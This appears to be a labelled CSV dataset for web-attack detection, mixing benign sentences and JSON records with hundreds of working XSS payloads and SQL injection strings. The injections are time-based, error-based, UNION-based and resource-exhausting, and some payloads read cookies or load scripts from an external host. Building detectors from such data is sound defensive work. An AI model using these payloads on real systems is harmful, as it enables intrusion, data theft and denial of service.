onloadend=alert(1)>,1,XSS,6614 select case when 6555 = 7349 then 1 else null end--,2,SQLi,18331 Join race.,3,normal,23092 "<element draggable=""true"" ondragenter=""alert(1)"">test</element>",1,XSS,3077 Select your style.,3,normal,24817 "<link onmousemove=""alert(1)"">test</link>",1,XSS,7902 Create a list.,3,normal,22863 "{""id"":null,""firstName"":""Aimi"",""lastName"":""Linah"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27480 -2165' where 6593 = 6593 or 9158 = 7254--,2,SQLi,19397 "1%"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( ""%"" = """,2,SQLi,12613 "1"" ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ""ubxw"" like ""ubxw",2,SQLi,14118 <button onOnline=javascript:alert(1)>,1,XSS,8749 select Comfort had done it in beds.,3,normal,25640 "&lt;SCRIPT/XSS SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,1888 <button onRowExit=javascript:alert(1)>,1,XSS,8540 <dialog onpointerleave=alert(1)>XSS</dialog>,1,XSS,6832 "( select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) )",2,SQLi,15748 <svg><dt onload=alert(1)></dt>,1,XSS,9539 "or benchmark(50000000,MD5(1))--",2,SQLi,20387 "<command oncopy=""alert(1)"" contenteditable>test</command>",1,XSS,4178 <thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus>,1,XSS,2238 "ABC<div style=""x:\xE2\x80\x84expression(javascript:alert(1)"">DEF",1,XSS,2855 "<button onmouseup=""alert(1)"">test</button>",1,XSS,7456 1 ) where 5866 = 5866 and 4595 = 4595#,2,SQLi,19773 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3",2,SQLi,19442 1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( 'sgdj' like 'sgdj,2,SQLi,10370 "1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and 'ozur' = 'ozur",2,SQLi,13364 column,3,normal,23159 1 where 2649 = 2649 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,15639 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i",2,SQLi,11908 -4248 where 3288 = 3288 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,10009 <rb onpointermove=alert(1)>XSS</rb>,1,XSS,9026 "-4772 ) ) ) union all select 3879,3879,3879,3879,3879--",2,SQLi,17770 Select a cozy spot for our picnic.,3,normal,22911 1 ) as nwfz where 7365 = 7365 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10260 Where's the weight loss clinic?,3,normal,23643 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337,2,SQLi,16907 "<a href=""javascript\x3A:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2455 "1' ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( 'khah' like 'khah",2,SQLi,12310 "<param onkeydown=""alert(1)"" contenteditable>test</param>",1,XSS,4316 "On mobile, select the playlist you want to share, then click on the three dots in the top right of the screen to select Make Collaborative.",3,normal,25850 <button onMoveStart=javascript:alert(1)>,1,XSS,8079 "<XSS STYLE=""behavior: url(%(htc)s);"">",1,XSS,8555 select ( case when ( 9318 = 7198 ) then 9318 else 9318* ( select 9318 from information_schema.character_sets ) end ) #,2,SQLi,13223 "1' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19371 "-2759%"" ) ) or 7769 = 1249#",2,SQLi,20903 <code onpointerout=alert(1)>XSS</code>,1,XSS,8484 -8143 ) union all select 3014--,2,SQLi,20412 "1"" ) as cysq where 5258 = 5258",2,SQLi,20576 "<acronym onkeydown=""alert(1)"" contenteditable>test</acronym>",1,XSS,3517 1 where 3027 = 3027 and 4595 = 4595#,2,SQLi,20001 1 ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ),2,SQLi,17660 Where's the hacienda?,3,normal,23576 "1' ) ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13298 <var onpointermove=alert(1)>XSS</var>,1,XSS,8588 "<div id=""105""><iframe src=""data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03""></iframe>//[""'`-->]]>]</div><div id=""106""><img src onerror /"" '""= alt=alert(106)//"">//[""'`-->]]>]</div><div id=""107""><title onpropertychange=alert(107)></title><title title=></title>//[""'`-->]]>]</div>",1,XSS,22 "1"" ) where 4971 = 4971 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,15437 "1 ) ) as aeat where 1007 = 1007 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12349 "To publish your own plan, the very first time you need to select the menu option jabber... Plans... Init my plan.",3,normal,25265 The extraordinary patience requisite to a successful termination of such an analysis can only be adequately realized by actual research; an idea may be obtained from Crookes's Select Methods in Analysis.,3,normal,25456 role,3,normal,23176 "<td draggable=""true"" ondragend=""alert(1)"">test</td>",1,XSS,5388 1' ) and 4380 = 5851 and ( 'cxcl' = 'cxcl,2,SQLi,19391 "1' ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 'wmrr' like 'wmrr",2,SQLi,12776 -3339' or 8571 = 8571--,2,SQLi,21317 <frameset><frame id=x onfocusin=alert(1)>,1,XSS,7726 "1'|| ( select 'rawn' from dual where 4988 = 4988 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) ) ||'",2,SQLi,11370 ><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;,1,XSS,1874 "1"" ) as ckoi where 4674 = 4674 union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,14226 "1"" ) where 3122 = 3122 and sleep ( 5 ) #",2,SQLi,19460 "<script>d.innerHTML+='';</script>//[""'`-->]]>]</div>",1,XSS,5280 "1 ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( 1185 = 1185",2,SQLi,12906 ",''),/*test*/%26%26%09sLeEp(5)%09--+",2,SQLi,19943 1' ) as nftr where 8825 = 8825 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14930 "<slot onkeyup=""alert(1)"" contenteditable>test</slot>",1,XSS,5135 <optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup>,1,XSS,3057 "1%"" ) ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11324 "1'+ ( select tvpj where 7058 = 7058 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,13432 "<image xlink:href=""data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E""/>",1,XSS,865 Join club.,3,normal,23102 Up to 45% off select Milwaukee Power Tools and Accessories,3,normal,25209 "<div draggable=""true"" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem>",1,XSS,873 <image src =q onerror=prompt(8)>,1,XSS,9407 "<audio autoplay controls onseeked=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1510 ORDER BY 9,2,SQLi,22424 "1 ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15157 "-9076'+ ( select lqvj where 8551 = 8551 union all select 8551,8551,8551,8551--",2,SQLi,15323 1'+ ( select qydm where 6019 = 6019,2,SQLi,20054 1' ) ) union all select null#,2,SQLi,20765 "-1597"" union all select 6038,6038,6038,6038,6038,6038,6038,6038,6038,6038--",2,SQLi,15599 1 ) where 8813 = 8813,2,SQLi,21677 "Up tp 40% off select Fossil, Micheal Kors Watches and more",3,normal,25204 "<nobr draggable=""true"" ondragleave=""alert(1)"">test</nobr>",1,XSS,4126 "admin"" ) or ( ""1"" = ""1",2,SQLi,21380 Select execute.,3,normal,24755 ><img src=x onerror=javascript:alert(1)>,1,XSS,7827 "1, ( select ( case when ( 1255 = 8025 ) then 1 else 1255* ( select 1255 from mysql.db ) end ) )",2,SQLi,14405 <nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus>,1,XSS,2468 <scr<script>ipt>alert(document.cookie)</scr</script>ipt>,1,XSS,4218 "&apos, OR 1=1",2,SQLi,22215 <ol onpointerleave=alert(1)>XSS</ol>,1,XSS,8880 <u id=x tabindex=1 onactivate=alert(1)></u>,1,XSS,7106 "<plaintext onmouseleave=""alert(1)"">test</plaintext>",1,XSS,5377 or'1=1′,2,SQLi,22520 "<svg onpaste=""alert(1)"" contenteditable>test</svg>",1,XSS,5615 "1' ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'fgox' like 'fgox",2,SQLi,10950 "-8205' or elt ( 6581 = 3480,3480 ) and 'sosv' = 'sosv",2,SQLi,18137 <svg><blink onload=alert(1)></blink>,1,XSS,8869 "<style>@keyframes x{}</style><dl style=""animation-name:x"" onanimationstart=""alert(1)""></dl>",1,XSS,1713 "-9672%"" ) ) ) order by 1#",2,SQLi,21122 ORDER BY 22--,2,SQLi,22245 "<style>:target {color: red;}</style><param id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></param>",1,XSS,914 "1"" where 4366 = 4366 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13246 <progress id=x tabindex=1 onfocus=alert(1)></progress>,1,XSS,4791 1' where 1045 = 1045 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,16349 Packages of 12 are available at select retailers for $3.29.,3,normal,25796 <nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus>,1,XSS,2901 "<meta draggable=""true"" ondragenter=""alert(1)"">test</meta>",1,XSS,4037 -5580 or 4829 = 1968,2,SQLi,21777 "1 ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13206 "<frameset draggable=""true"" ondragstart=""alert(1)"">test</frameset>",1,XSS,2848 I'm thinking about where to take a painting class.,3,normal,23954 "<samp onbeforecut=""alert(1)"" contenteditable>test</samp>",1,XSS,4259 select ( case when ( 4006 = 1276 ) then 1 else 4006* ( select 4006 from master..sysdatabases ) end ) --,2,SQLi,13985 Select a fabric for the sewing project.,3,normal,24248 "-7553%"" or 3571 = 2886",2,SQLi,21437 "-5657' ) ) ) union all select 8071,8071,8071,8071,8071,8071,8071,8071#",2,SQLi,16199 "<div draggable=""true"" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu>",1,XSS,1256 "-9881"" ) ) or 9850 = 8118#",2,SQLi,20957 or%201=1 --,2,SQLi,22348 "-3566' where 3641 = 3641 union all select 3641,3641,3641,3641,3641#",2,SQLi,16509 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'cwuy' = 'cwuy",2,SQLi,14721 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 'vwxg' = 'vwxg",2,SQLi,12001 <figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus>,1,XSS,2124 <i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus>,1,XSS,2675 Modi nd his Govt have no guts b ban anyone of their Chinese etc Citizen of India should Ban Modi Govts misconduct!!. Beware of Shameless and Selective Deshbhakti!!!,3,normal,26493 "1 ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13253 "1%' union all select null,null,null,null,null,null#",2,SQLi,18329 "<section onmouseenter=""alert(1)"">test</section>",1,XSS,6120 Where's the SQL tutorial?,3,normal,23404 <script>alert(1)//INJECTX,1,XSS,9711 "&apos, OR",2,SQLi,22466 "<IMG SRC=x ontoggle=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3613 "1%"" ) order by 1#",2,SQLi,22097 Delete post.,3,normal,23105 "-7267 ) union all select 1912,1912,1912,1912,1912,1912,1912,1912--",2,SQLi,16577 "-2715' ) ) union all select 8646,8646,8646,8646,8646,8646,8646,8646--",2,SQLi,16272 `'><script>\x0Bjavascript:alert(1)</script>,1,XSS,7069 "<style>@keyframes slidein {}</style><marquee style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></marquee>",1,XSS,339 "1"" ) where 3826 = 3826",2,SQLi,21419 "<cite onmousedown=""alert(1)"">test</cite>",1,XSS,7893 "<div draggable=""true"" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q>",1,XSS,1333 "-3492"" where 4094 = 4094 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10560 "<img src=""blah>"" onmouseover=""document.vulnerable=true;"">",1,XSS,4006 "{""id"":null,""firstName"":""Steven"",""lastName"":""Koh"",""address"":""20 Parry View"",""city"":""824"",""telephone"":""1309787313""}",3,normal,27127 -4104%' or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and '%' = ',2,SQLi,10708 "{""id"":null,""firstName"":""Kenneth Wai Keen"",""lastName"":""Tang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27532 privileges,3,normal,23175 "<dd onmouseover=""alert(1)"">test</dd>",1,XSS,8918 "-7469 ) where 5875 = 5875 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,17031 "<video ondblclick=""alert(1)"">test</video>",1,XSS,7774 <keygen onpointerenter=alert(1)>XSS</keygen>,1,XSS,7020 "1, ( select ( case when ( 7711 = 7711 ) then 1 else 7711* ( select 7711 from information_schema.character_sets ) end ) )",2,SQLi,13163 Only select school administrators and instructors knew the participants' true identities.,3,normal,25822 1' ) ) ) rlike sleep ( 5 ) and ( ( ( 'rozr' like 'rozr,2,SQLi,17958 <center onpointerover=alert(1)>XSS</center>,1,XSS,7264 1 where 2382 = 2382,2,SQLi,21945 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#",2,SQLi,14424 The government may select the documents for her to review.,3,normal,25441 "javascript://</title>""/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/",1,XSS,1843 "<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#",1,XSS,35 1' where 2183 = 2183,2,SQLi,21851 Where's the river?,3,normal,23520 "<div draggable=""true"" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid>",1,XSS,1078 <svg><select onload=alert(1)></select>,1,XSS,8506 "1"" ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""lano"" = ""lano",2,SQLi,12646 "1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""gxhz"" = ""gxhz",2,SQLi,10532 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( 'ctbs' like 'ctbs",2,SQLi,13451 "<q draggable=""true"" ondragleave=""alert(1)"">test</q>",1,XSS,5401 "&lt;LINK REL=\""stylesheet\"" HREF=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;css\""&gt;",1,XSS,1886 "-3817"" ) as vugz where 3064 = 3064 or 9323 = 9323#",2,SQLi,18521 1 ) where 5629 = 5629,2,SQLi,21703 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,12868 "<dfn onmousedown=""alert(1)"">test</dfn>",1,XSS,8434 "<menu onpaste=""alert(1)"" contenteditable>test</menu>",1,XSS,5160 "<link onmouseout=""alert(1)"">test</link>",1,XSS,8274 "1"" ) ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16699 "-5230"" ) or elt ( 1032 = 1032,3623 ) and ( ""aivb"" like ""aivb",2,SQLi,17140 "1' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( 'ajkb' = 'ajkb",2,SQLi,12774 Where's the table stored?,3,normal,23392 <datalist onpointerenter=alert(1)>XSS</datalist>,1,XSS,5888 "UNION ALL SELECT 1,2,3",2,SQLi,21370 "<meta onpaste=""alert(1)"" contenteditable>test</meta>",1,XSS,5272 "><script+src=https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)""></script>",1,XSS,1747 -2569' union all select 4484--,2,SQLi,20533 Create a striking masterpiece.,3,normal,22733 Carefully select the menu.,3,normal,24343 <x contenteditable onkeydown=alert(1)>press any key!,1,XSS,5282 Filter list.,3,normal,23098 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#",2,SQLi,13564 "1%' ) union all select null,null,null#",2,SQLi,19731 "<style>:target {color:red;}</style><footer id=x style=""transition:color 1s"" ontransitionend=alert(1)></footer>",1,XSS,1026 "<main onkeydown=""alert(1)"" contenteditable>test</main>",1,XSS,4720 "-9082 union all select 9858,9858,9858,9858,9858,9858--",2,SQLi,18030 ) or pg_sleep(5)--,2,SQLi,22030 "1' ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'nlnk' like 'nlnk",2,SQLi,11122 "<IMG SRC=x onpageshow=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3259 "<ul onmouseleave=""alert(1)"">test</ul>",1,XSS,8635 "<source draggable=""true"" ondragenter=""alert(1)"">test</source>",1,XSS,3326 """ Select Medical Holdings: ""It's very good, a very good hospital chain.",3,normal,26469 "1 ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16290 "1 ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 7182 = 7182",2,SQLi,14373 "<table onbeforecopy=""alert(1)"" contenteditable>test</table>",1,XSS,3745 <ol id=x tabindex=1 onfocus=alert(1)></ol>,1,XSS,7474 "1"" ) as yzny where 4869 = 4869 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",2,SQLi,14757 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7",2,SQLi,15913 "Rabi` to select Ali, knowing that the dislike felt towards him by the Khorasanians would double their strength in fighting against him.",3,normal,25763 -6449' ) ) or 2590 = 2848,2,SQLi,21086 "1 ) where 7748 = 7748 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12419 "Inspired by Vietnam veterans, it will be shown at select performances.",3,normal,25989 "1' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'dhqz' = 'dhqz",2,SQLi,12389 Where's the temple?,3,normal,23533 "select * from users where id = 1 or ( 1 ) = 1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,13874 <source onpointerenter=alert(1)>XSS</source>,1,XSS,6816 "1%"" ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14000 "-1512"" union all select 9688,9688,9688,9688,9688,9688,9688,9688,9688,9688--",2,SQLi,15638 "<shadow onmousedown=""alert(1)"">test</shadow>",1,XSS,6824 1' where 9242 = 9242,2,SQLi,21818 "<style onmousedown=""alert(1)"">test</style>",1,XSS,7443 "-4408"" ) or 6872 = 6872 and ( ""oenu"" = ""oenu",2,SQLi,19150 "1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13391 "1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and 'jjxn' = 'jjxn",2,SQLi,11255 1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( 'cqwz' like 'cqwz,2,SQLi,15318 or user like '%,2,SQLi,22151 Select the outfit.,3,normal,24801 1 ) as drgs where 1989 = 1989 order by 1--,2,SQLi,19277 <kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus>,1,XSS,2359 "<XSS STYLE=""xss:expression(document.vulnerable=true)"">",1,XSS,4666 1 where 6434 = 6434,2,SQLi,21976 "1' and make_set ( 4952 = 7129,7129 )",2,SQLi,19985 Select the best route.,3,normal,24306 "1%' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( '%' = '",2,SQLi,12343 "<data onmouseup=""alert(1)"">test</data>",1,XSS,8379 "1"" ) as buky where 7898 = 7898 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12433 "-9384%"" union all select 7031,7031,7031,7031,7031,7031,7031,7031,7031#",2,SQLi,16154 `><\x00img src=xxx:x onerror=javascript:alert(1)>,1,XSS,5709 select * from users where id = 1 <@.$ or 1 = 1 -- 1,2,SQLi,18253 "select * from users where id = 1 or $+<\ union select 1,@@VERSION -- 1",2,SQLi,16148 <keygen onpointermove=alert(1)>XSS</keygen>,1,XSS,7179 "-3321"" where 1603 = 1603 union all select 1603,1603,1603,1603#",2,SQLi,16970 Select the best lens for photography.,3,normal,24116 <select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus>,1,XSS,2126 "-3013' ) where 2027 = 2027 union all select 2027,2027,2027,2027--",2,SQLi,16707 "<abbr oncut=""alert(1)"" contenteditable>test</abbr>",1,XSS,5661 "1"" and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ""xyjg"" = ""xyjg",2,SQLi,10033 <xss onpointermove=alert(1) style=display:block>XSS</xss>,1,XSS,3978 "<style>:target {transform: rotate(180deg);}</style><s id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></s>",1,XSS,734 "1"" ) ) as hzcq where 9250 = 9250 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,10193 "<cite onpaste=""alert(1)"" contenteditable>test</cite>",1,XSS,5198 millisecond,3,normal,23246 "<meter draggable=""true"" ondragstart=""alert(1)"">test</meter>",1,XSS,3765 "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;""></BODY></HTML>",1,XSS,81 "<option oncopy=""alert(1)"" contenteditable>test</option>",1,XSS,4563 "<textarea><img title=""</textarea><img src onerror=alert(1)>""></textarea>",1,XSS,2333 "<bdo onbeforecopy=""alert(1)"" contenteditable>test</bdo>",1,XSS,4508 "1"" ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( ""jmjr"" like ""jmjr",2,SQLi,11049 "<style>@keyframes slidein {}</style><command style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></command>",1,XSS,335 "1"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ""mjkl"" = ""mjkl",2,SQLi,12707 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( 'btnl' = 'btnl",2,SQLi,13396 "),NULL)%20waifor%20delay%20'0:0:20'%20/*",2,SQLi,19446 1%' ) or sleep ( 5 ) and ( '%' = ',2,SQLi,20137 Please select a thumbnail to get a larger image.,3,normal,25779 "{""id"":null,""firstName"":""Haryati"",""lastName"":""Kamis"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26760 1'+ ( select 'supo' where 8691 = 8691,2,SQLi,19868 "<br ondblclick=""alert(1)"">test</br>",1,XSS,9078 "<html draggable=""true"" ondrag=""alert(1)"">test</html>",1,XSS,5152 "-2838"" where 5442 = 5442 union all select 5442#",2,SQLi,18893 select * from users where id = 1 <@<@ or 1 = 1 -- 1,2,SQLi,18260 "These will act in a similar way to departmental select committees of the House of Commons, with similar powers of inquiry.",3,normal,25324 "<dialog onmouseover=""alert(1)"">test</dialog>",1,XSS,6837 <ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus>,1,XSS,2374 -5356' ) or 9323 = 9323#,2,SQLi,21216 <template onpointermove=alert(1)>XSS</template>,1,XSS,6179 "<summary onmouseleave=""alert(1)"">test</summary>",1,XSS,6249 1'|| ( select 'hafu' where 6226 = 6226,2,SQLi,19711 "<iframe draggable=""true"" ondrag=""alert(1)"">test</iframe>",1,XSS,4255 "<image onkeydown=""alert(1)"" contenteditable>test</image>",1,XSS,4291 "1' ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'amjh' = 'amjh",2,SQLi,12655 Update settings.,3,normal,22809 "<rp draggable=""true"" ondragend=""alert(1)"">test</rp>",1,XSS,5402 